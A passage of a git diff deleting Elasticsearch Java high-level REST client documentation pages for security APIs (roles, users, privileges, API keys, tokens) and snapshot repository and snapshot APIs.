-["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -===== All privileges of a specific application - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-all-application-privileges-request] --------------------------------------------------- - -===== All privileges of all applications - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-all-privileges-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Privileges Response - -The returned +{response}+ allows to get information about the retrieved privileges as follows. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/get-role-mappings.asciidoc b/docs/java-rest/high-level/security/get-role-mappings.asciidoc deleted file mode 100644 index b279702a4e1..00000000000 --- a/docs/java-rest/high-level/security/get-role-mappings.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-get-role-mappings]] -=== Get Role Mappings API - -[[java-rest-high-security-get-role-mappings-execution]] -==== Execution - -Retrieving a role mapping can be performed using the `security().getRoleMappings()` -method and by setting role mapping name on `GetRoleMappingsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-execute] --------------------------------------------------- - -Retrieving multiple role mappings can be performed using the `security.getRoleMappings()` -method and by setting role mapping names on `GetRoleMappingsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-list-execute] --------------------------------------------------- - -Retrieving all role mappings can be performed using the `security.getRoleMappings()` -method and with no role mapping name on `GetRoleMappingsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-all-execute] --------------------------------------------------- - -[[java-rest-high-security-get-role-mappings-response]] -==== Response - -The returned `GetRoleMappingsResponse` contains the list of role mapping(s). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-response] --------------------------------------------------- - -[[java-rest-high-security-get-role-mappings-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().getRoleMappingsAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-execute-async] --------------------------------------------------- -<1> The `GetRoleMappingsRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `GetRoleMappingsResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/security/get-roles.asciidoc b/docs/java-rest/high-level/security/get-roles.asciidoc deleted file mode 100644 index 2c698222c7a..00000000000 --- a/docs/java-rest/high-level/security/get-roles.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ - --- -:api: get-roles -:request: GetRolesRequest -:response: GetRolesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Roles API - -[id="{upid}-{api}-request"] -==== Get Roles Request - -Retrieving a role can be performed using the `security().getRoles()` -method and by setting the role name on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -Retrieving multiple roles can be performed using the `security().getRoles()` -method and by setting multiple role names on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-list-request] --------------------------------------------------- - -Retrieving all roles can be performed using the `security().getRoles()` -method without specifying any role names on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-all-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Roles Response - -The returned +{response}+ allows getting information about the retrieved roles as follows. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/get-user-privileges.asciidoc b/docs/java-rest/high-level/security/get-user-privileges.asciidoc deleted file mode 100644 index b8051cbfae6..00000000000 --- a/docs/java-rest/high-level/security/get-user-privileges.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ --- -:api: get-user-privileges -:request: GetUserPrivilegesRequest -:response: GetUserPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get User Privileges API - -include::../execution-no-req.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get User Privileges Response - -The returned +{response}+ contains the following properties - -`clusterPrivileges`:: -A `Set` of all _cluster_ privileges that are held by the user. -This will be the union of all the _cluster_ privileges from the user's roles. - -`globalPrivileges`:: -A `Set` of all _global_ privileges that are held by the user. -This will be the union of all the _global_ privileges from the user's roles. -Because this a union of multiple roles, it may contain multiple privileges for -the same `category` and `operation` (which is why is is represented as a `Set` -rather than a single object). - -`indicesPrivileges`:: -A `Set` of all _index_ privileges that are held by the user. -This will be the union of all the _index_ privileges from the user's roles. -Because this a union of multiple roles, it may contain multiple privileges for -the same `index`, and those privileges may have independent field level security -access grants and/or multiple document level security queries. - -`applicationPrivileges`:: -A `Set` of all _application_ privileges that are held by the user. -This will be the union of all the _application_ privileges from the user's roles. - -`runAsPrivilege`:: -A `Set` representation of the _run-as_ privilege that is held by the user. -This will be the union of the _run-as_ privilege from each of the user's roles. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/security/get-users.asciidoc b/docs/java-rest/high-level/security/get-users.asciidoc deleted file mode 100644 index cbd45801fe9..00000000000 --- a/docs/java-rest/high-level/security/get-users.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ - --- -:api: get-users -:request: GetUsersRequest -:response: GetUsersResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Users API - -[id="{upid}-{api}-request"] -==== Get Users Request - -Retrieving a user can be performed using the `security().getUsers()` -method and by setting the username on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -Retrieving multiple users can be performed using the `security().getUsers()` -method and by setting multiple usernames on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-list-request] --------------------------------------------------- - -Retrieving all users can be performed using the `security().getUsers()` -method without specifying any usernames on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-all-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Users Response - -The returned +{response}+ allows getting information about the retrieved users as follows. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/has-privileges.asciidoc b/docs/java-rest/high-level/security/has-privileges.asciidoc deleted file mode 100644 index 7c5f09a171c..00000000000 --- a/docs/java-rest/high-level/security/has-privileges.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ --- -:api: has-privileges -:request: HasPrivilegesRequest -:response: HasPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Has Privileges API - -[id="{upid}-{api}-request"] -==== Has Privileges Request -The +{request}+ supports checking for any or all of the following privilege types: - -* Cluster Privileges -* Index Privileges -* Application Privileges - -Privileges types that you do not wish to check my be passed in as +null+, but as least -one privilege must be specified. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Has Privileges Response - -The returned +{response}+ contains the following properties - -`username`:: -The username (userid) of the current user (for whom the "has privileges" -check was executed) - -`hasAllRequested`:: -`true` if the user has all of the privileges that were specified in the -+{request}+. Otherwise `false`. - -`clusterPrivileges`:: -A `Map` where each key is the name of one of the cluster -privileges specified in the request, and the value is `true` if the user -has that privilege, and `false` otherwise. -+ -The method `hasClusterPrivilege` can be used to retrieve this information -in a more fluent manner. This method throws an `IllegalArgumentException` -if the privilege was not included in the response (which will be the case -if the privilege was not part of the request). - -`indexPrivileges`:: -A `Map>` where each key is the name of an -index (as specified in the +{request}+) and the value is a `Map` from -privilege name to a `Boolean`. The `Boolean` value is `true` if the user -has that privilege on that index, and `false` otherwise. -+ -The method `hasIndexPrivilege` can be used to retrieve this information -in a more fluent manner. This method throws an `IllegalArgumentException` -if the privilege was not included in the response (which will be the case -if the privilege was not part of the request). - -`applicationPrivileges`:: -A `Map>>>` where each key is the -name of an application (as specified in the +{request}+). -For each application, the value is a `Map` keyed by resource name, with -each value being another `Map` from privilege name to a `Boolean`. -The `Boolean` value is `true` if the user has that privilege on that -resource for that application, and `false` otherwise. -+ -The method `hasApplicationPrivilege` can be used to retrieve this -information in a more fluent manner. This method throws an -`IllegalArgumentException` if the privilege was not included in the -response (which will be the case if the privilege was not part of the -request). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `hasMonitor` will be `true` if the user has the `"monitor"` - cluster privilege. -<2> `hasWrite` will be `true` if the user has the `"write"` - privilege on the `"logstash-2018-10-05"` index. -<3> `hasRead` will be `true` if the user has the `"read"` - privilege on all possible indices that would match - the `"logstash-2018-*"` pattern. - diff --git a/docs/java-rest/high-level/security/invalidate-api-key.asciidoc b/docs/java-rest/high-level/security/invalidate-api-key.asciidoc deleted file mode 100644 index d1f747da882..00000000000 --- a/docs/java-rest/high-level/security/invalidate-api-key.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ --- -:api: invalidate-api-key -:request: InvalidateApiKeyRequest -:response: InvalidateApiKeyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Invalidate API Key API - -API Key(s) can be invalidated using this API. - -[id="{upid}-{api}-request"] -==== Invalidate API Key Request -The +{request}+ supports invalidating - -. A specific API key - -. All API keys for a specific realm - -. All API keys for a specific user - -. All API keys for a specific user in a specific realm - -. A specific key or all API keys owned by the current authenticated user - -===== Specific API key by API key id -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-api-key-id-request] --------------------------------------------------- - -===== Specific API key by API key name -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-api-key-name-request] --------------------------------------------------- - -===== All API keys for realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-realm-api-keys-request] --------------------------------------------------- - -===== All API keys for user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-api-keys-request] --------------------------------------------------- - -===== All API key for user in realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-realm-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for the current authenticated user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-api-keys-owned-by-authenticated-user-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Invalidate API Key Response - -The returned +{response}+ contains the information regarding the API keys that the request -invalidated. - -`invalidatedApiKeys`:: Available using `getInvalidatedApiKeys` lists the API keys - that this request invalidated. - -`previouslyInvalidatedApiKeys`:: Available using `getPreviouslyInvalidatedApiKeys` lists the API keys - that this request attempted to invalidate - but were already invalid. - -`errors`:: Available using `getErrors` contains possible errors that were encountered while - attempting to invalidate API keys. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/invalidate-token.asciidoc b/docs/java-rest/high-level/security/invalidate-token.asciidoc deleted file mode 100644 index 34969523c7b..00000000000 --- a/docs/java-rest/high-level/security/invalidate-token.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ --- -:api: invalidate-token -:request: InvalidateTokenRequest -:response: InvalidateTokenResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Invalidate Token API - -[id="{upid}-{api}-request"] -==== Invalidate Token Request -The +{request}+ supports invalidating - -. A specific token, that can be either an _access token_ or a _refresh token_ - -. All tokens (both _access tokens_ and _refresh tokens_) for a specific realm - -. All tokens (both _access tokens_ and _refresh tokens_) for a specific user - -. All tokens (both _access tokens_ and _refresh tokens_) for a specific user in a specific realm - -===== Specific access token -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-access-token-request] --------------------------------------------------- - -===== Specific refresh token -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-refresh-token-request] --------------------------------------------------- - -===== All tokens for realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-realm-tokens-request] --------------------------------------------------- - -===== All tokens for user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-tokens-request] --------------------------------------------------- - -===== All tokens for user in realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-realm-tokens-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Invalidate Token Response - -The returned +{response}+ contains the information regarding the tokens that the request -invalidated. - -`invalidatedTokens`:: Available using `getInvalidatedTokens` denotes the number of tokens - that this request invalidated. - -`previouslyInvalidatedTokens`:: Available using `getPreviouslyInvalidatedTokens` denotes - the number of tokens that this request attempted to invalidate - but were already invalid. - -`errors`:: Available using `getErrors` contains possible errors that were encountered while - attempting to invalidate specific tokens. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/put-privileges.asciidoc b/docs/java-rest/high-level/security/put-privileges.asciidoc deleted file mode 100644 index ba8d8878e15..00000000000 --- a/docs/java-rest/high-level/security/put-privileges.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: put-privileges -:request: PutPrivilegesRequest -:response: PutPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Privileges API - -Application privileges can be created or updated using this API. - -[id="{upid}-{api}-request"] -==== Put Privileges Request -A +{request}+ contains list of application privileges that -need to be created or updated. Each application privilege -consists of an application name, application privilege, -set of actions and optional metadata. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Privileges Response - -The returned +{response}+ contains the information about the status -for each privilege present in the +{request}+. The status would be -`true` if the privilege was created, `false` if the privilege was updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The response contains the status for given application name and -privilege name. The status would be `true` if the privilege was created, -`false` if the privilege was updated. diff --git a/docs/java-rest/high-level/security/put-role-mapping.asciidoc b/docs/java-rest/high-level/security/put-role-mapping.asciidoc deleted file mode 100644 index 819aa776b68..00000000000 --- a/docs/java-rest/high-level/security/put-role-mapping.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-put-role-mapping]] -=== Put Role Mapping API - -[[java-rest-high-security-put-role-mapping-execution]] -==== Execution - -Creating and updating a role mapping can be performed using the `security().putRoleMapping()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-execute] --------------------------------------------------- - -[[java-rest-high-security-put-role-mapping-response]] -==== Response - -The returned `PutRoleMappingResponse` contains a single field, `created`. This field -serves as an indication if a role mapping was created or if an existing entry was updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-response] --------------------------------------------------- -<1> `created` is a boolean indicating whether the role mapping was created or updated - -[[java-rest-high-security-put-role-mapping-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().putRoleMappingAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-execute-async] --------------------------------------------------- -<1> The `PutRoleMappingRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `PutRoleMappingResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/security/put-role.asciidoc b/docs/java-rest/high-level/security/put-role.asciidoc deleted file mode 100644 index d418375237d..00000000000 --- a/docs/java-rest/high-level/security/put-role.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ - --- -:api: put-role -:request: PutRoleRequest -:response: PutRoleResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Role API - -[id="{upid}-{api}-request"] -==== Put Role Request - -The +{request}+ class is used to create or update a role in the Native Roles -Store. The request contains a single role, which encapsulates privileges over -resources. A role can be assigned to an user using the -<<{upid}-put-role-mapping, Put Role Mapping API>>. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Role Response - -The returned +{response}+ contains a single field, `created`. This field -serves as an indication if the role was created or if an existing entry was -updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `created` is a boolean indicating whether the role was created or updated diff --git a/docs/java-rest/high-level/security/put-user.asciidoc b/docs/java-rest/high-level/security/put-user.asciidoc deleted file mode 100644 index bca93244175..00000000000 --- a/docs/java-rest/high-level/security/put-user.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: put-user -:request: PutUserRequest -:response: PutUserResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put User API - -[id="{upid}-{api}-request"] -==== Put User Request Request - -The +{request}+ class is used to create or update a user in the Native Realm. -There are 3 different factory methods for creating a request. - -===== Create or Update User with a Password - -If you wish to create a new user (or update an existing user) and directly specifying the user's new password, use the -`withPassword` method as shown below: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-password-request] --------------------------------------------------- - -===== Create or Update User with a Hashed Password - -If you wish to create a new user (or update an existing user) and perform password hashing on the client, -then use the `withPasswordHash` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hash-request] - --------------------------------------------------- -===== Update a User without changing their password - -If you wish to update an existing user, and do not wish to change the user's password, -then use the `updateUserProperties` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-update-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put User Response - -The returned `PutUserResponse` contains a single field, `created`. This field -serves as an indication if a user was created or if an existing entry was updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-user-response] --------------------------------------------------- -<1> `created` is a boolean indicating whether the user was created or updated diff --git a/docs/java-rest/high-level/snapshot/create_repository.asciidoc b/docs/java-rest/high-level/snapshot/create_repository.asciidoc deleted file mode 100644 index 5c545292097..00000000000 --- a/docs/java-rest/high-level/snapshot/create_repository.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[java-rest-high-snapshot-create-repository]] -=== Snapshot Create RepositoryAPI - -The Snapshot Create RepositoryAPI allows to register a snapshot repository. - -[[java-rest-high-snapshot-create-repository-request]] -==== Snapshot Create RepositoryRequest - -A `PutRepositoryRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request] --------------------------------------------------- - -==== Repository Settings -Settings requirements will differ based on the repository backend chosen. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-repository-settings] --------------------------------------------------- -<1> Sets the repository settings - -==== Providing the Settings -The settings to be applied can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-create-settings] --------------------------------------------------- -<1> Settings provided as `Settings` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-settings-builder] --------------------------------------------------- -<1> Settings provided as `Settings.Builder` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-settings-source] --------------------------------------------------- -<1> Settings provided as `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-settings-map] --------------------------------------------------- -<1> Settings provided as a `Map` - -==== Required Arguments -The following arguments must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-name] --------------------------------------------------- -<1> The name of the repository - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-type] --------------------------------------------------- -<1> The type of the repository - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-verify] --------------------------------------------------- -<1> Verify after creation as a `Boolean` - -[[java-rest-high-snapshot-create-repository-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-create-repository-async]] -==== Asynchronous Execution - -The asynchronous execution of a repository put settings requires both the -`PutRepositoryRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-execute-async] --------------------------------------------------- -<1> The `PutRepositoryRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutRepositoryResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-snapshot-create-repository-response]] -==== Snapshot Create RepositoryResponse - -The returned `PutRepositoryResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-response] --------------------------------------------------- -<1> Indicates the node has acknowledged the request diff --git a/docs/java-rest/high-level/snapshot/create_snapshot.asciidoc b/docs/java-rest/high-level/snapshot/create_snapshot.asciidoc deleted file mode 100644 index 971a6ee4867..00000000000 --- a/docs/java-rest/high-level/snapshot/create_snapshot.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ -[[java-rest-high-snapshot-create-snapshot]] -=== Create Snapshot API - -Use the Create Snapshot API to create a new snapshot. - -[[java-rest-high-snapshot-create-snapshot-request]] -==== Create Snapshot Request - -A `CreateSnapshotRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request] --------------------------------------------------- - -==== Required Arguments -The following arguments are mandatory: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-repositoryName] --------------------------------------------------- -<1> The name of the repository. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-snapshotName] --------------------------------------------------- -<1> The name of the snapshot. - -==== Optional Arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-indices] --------------------------------------------------- -<1> A list of indices the snapshot is applied to. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-indicesOptions] --------------------------------------------------- -<1> Options applied to the indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-partial] --------------------------------------------------- -<1> Set `partial` to `true` to allow a successful snapshot without the -availability of all the indices primary shards. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-includeGlobalState] --------------------------------------------------- -<1> Set `includeGlobalState` to `false` to prevent writing the cluster's global -state as part of the snapshot. Defaults to `true`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue`. -<2> Timeout to connect to the master node as a `String`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-waitForCompletion] --------------------------------------------------- -<1> Waits for the snapshot to be completed before a response is returned. - -[[java-rest-high-snapshot-create-snapshot-sync]] -==== Synchronous Execution - -Execute a `CreateSnapshotRequest` synchronously to receive a `CreateSnapshotResponse`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-execute] --------------------------------------------------- - -Retrieve the `SnapshotInfo` from a `CreateSnapshotResponse` when the snapshot is fully created. -(The `waitForCompletion` parameter is `true`). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-response-snapshot-info] --------------------------------------------------- -<1> The `SnapshotInfo` object. - -[[java-rest-high-snapshot-create-snapshot-async]] -==== Asynchronous Execution - -The asynchronous execution of a create snapshot request requires both the -`CreateSnapshotRequest` instance and an `ActionListener` instance to be -passed as arguments to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-execute-async] --------------------------------------------------- -<1> The `CreateSnapshotRequest` to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back with the `onResponse` method -if the execution is successful or the `onFailure` method if the execution -failed. - -A typical listener for `CreateSnapshotResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of a failure. The raised exception is provided as an -argument. - -[[java-rest-high-snapshot-create-snapshot-response]] -==== Snapshot Create Response - -Use the `CreateSnapshotResponse` to retrieve information about the evaluated -request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-response] --------------------------------------------------- -<1> Indicates the node has started the request. diff --git a/docs/java-rest/high-level/snapshot/delete_repository.asciidoc b/docs/java-rest/high-level/snapshot/delete_repository.asciidoc deleted file mode 100644 index e88535f2362..00000000000 --- a/docs/java-rest/high-level/snapshot/delete_repository.asciidoc +++ /dev/null @@ 